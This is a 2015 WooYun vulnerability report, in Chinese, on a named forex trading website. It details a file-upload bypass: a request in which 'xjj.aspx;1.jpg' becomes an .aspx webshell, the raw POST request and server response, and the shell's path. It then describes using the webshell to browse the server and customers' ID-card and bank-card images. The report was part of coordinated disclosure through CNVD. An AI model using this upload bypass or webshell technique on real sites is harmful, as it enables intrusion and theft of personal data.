当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136415

漏洞标题:ASC网上外汇交易服务公司任意文件上传处未定义和过滤文件类型(已getshell可查看用户身份证及银行卡图片)

相关厂商:ASC网上外汇交易服务公司

漏洞作者: 帅克笛枫

提交时间:2015-08-26 10:28

修复时间:2015-10-13 09:32

公开时间:2015-10-13 09:32

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-29: 厂商已经确认,细节仅向厂商公开
2015-09-08: 细节向核心白帽子及相关领域专家公开
2015-09-18: 细节向普通白帽子公开
2015-09-28: 细节向实习白帽子公开
2015-10-13: 细节向公众公开

简要描述:

~童话里都是骗人的,我不可能是你的王子~张开双手变成翅膀守护你~你要相信相信我们会像童话故事里~幸福和快乐是结局~一起写我们的结局.....

详细说明:

访问:http://ascforex.com/zh-cn/read.jsp?id=1,如图所示:

asc1.png

ASC网上外汇交易服务公司

asc2.png

点击交易账户,选择模拟账户,http://ascforex.com/zh-cn/read.jsp?id=11,如图所示:

asc3.png

在证件上传处,上传xxj.aspx;1.jpg文件,同时开启biu,biu抓包,如图所示:

asc4.png

将截取到的数据包,发送至repeater区域进行编辑,如图所示:

asc5.png

将POST /office/uploadimage.jsp?action=upload&tablename=&updatefield=&index=&val= HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------KM7Ij5gL6KM7Ij5KM7KM7Ef1Ij5ae0
User-Agent: Shockwave Flash
Host: ascforex.com
Content-Length: 73133
Proxy-Connection: Keep-Alive
Pragma: no-cache
------------KM7Ij5gL6KM7Ij5KM7KM7Ef1Ij5ae0
Content-Disposition: form-data; name="Filename"
xjj.aspx;1.jpg
------------KM7Ij5gL6KM7Ij5KM7KM7Ef1Ij5ae0
Content-Disposition: form-data; name="file"; filename="xjj.aspx;1.jpg"
Content-Type: application/octet-stream
代码中的filename="xjj.aspx;1.jpg"后缀及;去掉,上传文件名为xjj.aspx ,点击go,如图所示:

asc6.png

发送成功,HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 103
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CookieID=242316279; path=/
Set-Cookie: ASPSESSIONIDASRTTBCA=HPDHBHOAEMFCNEAKALHOMIEP; path=/
X-Powered-By: ASP.NET
Date: Sun, 23 Aug 2015 15:04:31 GMT
{success:true,message:'上传成功',data:{src:'/upfile/images/2015-8/2323431.aspx'},total:1,errors:''}
可以看到文件上传成功后的路径为/upfile/images/2015-8/2323431.aspx,访问http://ascforex.com//upfile/images/2015-8/2323431.aspx,如图所示:

asc7.png

输入webshell密码,如图所示:

asc8.png

漏洞证明:

查看当前系统信息(IP地址,IIS版本,OS等),如图所示:

asc9.png

系统当前开放的端口,如图所示:

asc10.png

开了3389,如图所示:

asc12.png

站点相关数据库,如图所示:

asc12.png

服务器上其他磁盘可访问,如图所示:

asc13.png

当前用户,如图所示:

asc14.png

3389端口已开,如图所示:

asc15.png

images目录下存放用户的身份证及银行卡图片,如图所示:

asc16.png

部分用户图片,如图所示:

D--wwwroot-ascforex-wwwroot-upfile-images-2014-11-3141619.jpg

D--wwwroot-ascforex-wwwroot-upfile-images-2014-12-1222548.png

D--wwwroot-ascforex-wwwroot-upfile-images-2015-1-12185211.png

D--wwwroot-ascforex-wwwroot-upfile-images-2015-1-12185857.png

D--wwwroot-ascforex-wwwroot-upfile-images-2015-3-317529.png

D--wwwroot-ascforex-wwwroot-upfile-images-2015-3-1191649.png

D--wwwroot-ascforex-wwwroot-upfile-images-2015-3-17162441.jpg

D--wwwroot-ascforex-wwwroot-upfile-images-2015-8-13204637.jpg

webshell和相关用户图片会在厂商确认后进行删除,不会进行其他应用~

修复方案:

~~修复~上传文件页面进行相关设置~~你们更专业~

版权声明:转载请注明来源 帅克笛枫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-08-29 09:31

厂商回复:

CNVD确认并复现所述情况,由CNVD通过网站管理单位网站公开的联系渠道向其出邮件通报.

最新状态:

暂无